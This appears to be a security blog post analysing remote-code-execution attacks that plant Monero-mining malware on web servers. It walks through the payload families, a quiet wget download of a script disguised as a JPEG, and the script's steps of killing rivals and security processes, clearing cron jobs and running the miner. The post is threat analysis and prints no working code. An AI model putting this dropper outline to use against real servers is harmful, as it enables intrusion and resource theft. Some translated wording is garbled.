Recipe for an RCE crypto-mining attack

RCE attack

RCE attacks are designed to exploit vulnerabilities in the source code of Web applications, especially those that enable remote code execution, and then to download and run crypto-mining malware on the affected servers.

RCE vulnerabilities are among the most dangerous vulnerabilities per se, as they allow attackers to execute malicious code on a vulnerable server. A recent research project found an extreme increase in RCE attacks.

RCE vulnerabilities and payload families

The following are RCE attacks where the payload tried to send a request to an external source. The methods for sending these requests vary, depending on the operating system and the desired result. For example, Windows server attackers used a Powershell command to download a file from an external source (Figure 1). Attackers attacking Linux servers used bash scripts and wget or curl commands for the same purpose.

The payloads of RCE attacks can be divided into three categories:

  • Crypto-Mining Malware: This payload attempts to download a script from a remote server and execute it locally on the vulnerable machine. The script causes the server to search for a cryptocurrency, especially Monero. We will discuss this type of attack in more detail below.
  • DDoS-Botnet: Like the crypto-miner payload, this payload also attempts to download and run a script. The difference is that in this payload, the script binds the vulnerable server into a DDoS botnet, so it participates in DDoS attacks at the request of the attackers.
  • Exploration: Such a payload is used when an attacker tries to find out if a server is vulnerable or not. In attacks with payloads of this type, many requests are sent to a specific server, each targeting a different parameter.

The following attack was found in the post-body of an HTTP request that was trying to exploit an RCE vulnerability to send a wget command to download and execute a script. Here you can see how the attacker tries to blur his tracks with the option “-q”, which stands for “Quiet Mode”.

The link is disguised as a JPEG image, but it actually contains a bash script that infects the vulnerable server with crypto-mining malware.

This downloaded script has three phases:

Stop background processes
Achieve persistence
Download and run the malware

First, the script ends processes that are running on the server in the background. These processes mainly include competing crypto-miners, as well as security mechanisms and CPU-intensive processes.

The script identifies competing crypto-miners by either terminating processes with known crypto-mining software or processes that include specific IPs or portions of crypto-wallets. Apparently, the attacker knows exactly who his competitors are, as he kills processes related to specific IPs and wallets – and he obviously does not like competition.

In the second phase, the script deletes the current cron jobs in the system. A cronjob is a process for scheduled tasks under Linux.

In the third and final phase, the system eventually becomes infected. First, the script downloads a dynamic configuration file. In the attacks we observed, the configuration file came from the same host from which the script was downloaded.

Next, the malware itself will be downloaded. The script then calculates the number of cores in the server and runs the malware with the configuration file and the number of cores as input parameters.

To increase the chances of success, the script then repeats the third phase four more times, each time downloading a different configuration file and malicious program. The other malicious programs only execute it if the previous attempts were unsuccessful.

If the script succeeds, the vulnerable server on which it ran is infected with malware that deserves cryptocurrency for the attacker.

The trail of money

In the downloaded configuration files we found were active monero-wallets that belonged to the attackers. We tracked the wallets and mining pools to see how much money can be made with crypto-mining.

At this time, the attacker had earned about 41 Monero, which (according to the current Monero / dollar rate) is about $ 10,000.

featured image by shutterstock